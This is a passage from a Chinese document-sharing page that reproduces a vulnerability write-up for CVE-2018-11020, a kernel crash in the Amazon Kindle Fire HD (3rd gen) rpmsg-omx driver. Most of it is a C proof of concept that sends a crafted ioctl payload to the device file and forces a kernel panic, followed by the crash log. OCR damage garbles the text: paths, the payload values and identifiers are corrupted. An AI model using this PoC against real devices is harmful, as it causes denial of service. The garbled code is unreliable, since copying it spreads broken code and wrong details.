(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
《(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(10页珍藏版)》请在优知文库上搜索。
1、(CVE-2018-11020) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 内核组件中的内核模块 omapdriversrpmsgrpmsg_omx.c 允许攻击者通过设备文件/ dev / rpmsg上的 ioctl的参数注入特制的参数使用命令3221772291的omxl,并导致内核崩溃。要探索此漏洞,必须打开设备文件devrpmsg-omxl,并使用命令3221772291 和精心设计的有效负载作为第三个参数来对该设备文件进行ioct
2、l系统调用。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc/* This is poc of Kindle Fire HD 3rd* A bug in the ioctl interface of device file devrpmsg-omxl causes t he system crash via IOCTL 3221772291.* Related buggy struct name is gcicommit.* This Poc should run with permission to do ioctl on devrpmsg-oml.* The fowllwing
3、 is kmsg of kernel crash infomation:*/#include #include #include #include const static char *driver = devrpmsg-omxl;static command = 3221772291;int main(int argc, char *argv, char *env) unsigned int payload = 0xb5dl8de2, 0f6e48al7j 09179c429, 089 a32e03 ;int fd = 0;fd = open(driverj O_RDWR);if (fd d
4、atalocaltmplog); return -1;printf(Try open %s with command 0%x.n, driver, command); printf(System will crash and reboot.n);if(ioctl(fdj command, Spayload) /data/IOCaItmplog);return -1;close(fd);return 0;崩溃日志146.290710Unable to handle kernel paging request at virtual address b5dl8de6146.299438pgd = d
5、72dc000146.302795b5dl8de6 *pgd=00000000146.307281Internal error: Oops: 5 #1 PREEMPT SMP ARM146.313232Modules linked in: omaplfb(0) pvrsrvkm(O) pvr_loggen(0)146.320983CPU: 0Tainted: GO (3.4.83-gd2afc0bae69 #1)146.328308 PC is at ion_free+0xc0xb4146.332672 LR is at rpmsg_omx_ioctl+0x2cc/0x598146.33789
6、0 pc : Ir : psr: 60000013146.337890 sp : c35b5e60 ip:c35b5e80 fp : c35b5e7c146.350860 rl0: c35b5ea8 r9:de88c4d8 r8 : c35b4000 f8146.356872 r7 : dd32b580 r6:00000003 r5 : d71d5880 r4 : be92f5 00146.364135 r3 : d71d58ec r2:d71d58ec rl : b5dl8de2 r0 : d7aaaa146.371551 Flags: nZCv IRQson FIQs on Mode SV
7、C_32 ISA ARM Segment user146.379516 Control: 10c5387d Table: 972dc04a DAC: 00000015146.386077146.386077 PC: 0xc02e84c0: 146.391052 84c0 0a000001 058 e2433001 e5853058e2871010ebfddc25ela00006eb0ee904e5953146.401580 84e0 e353000003f e285005c e5933cba000011Ia0009ela0200de3c23d7fe3c33146.412292 8500 e59
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- CVE-2018-11020Amazon Kindle Fire HD 3rd OS kernel组件安全漏洞 CVE 2018 11020 Amazon rd kernel 组件 安全漏洞

链接地址:https://www.yzwku.com/doc/496755.html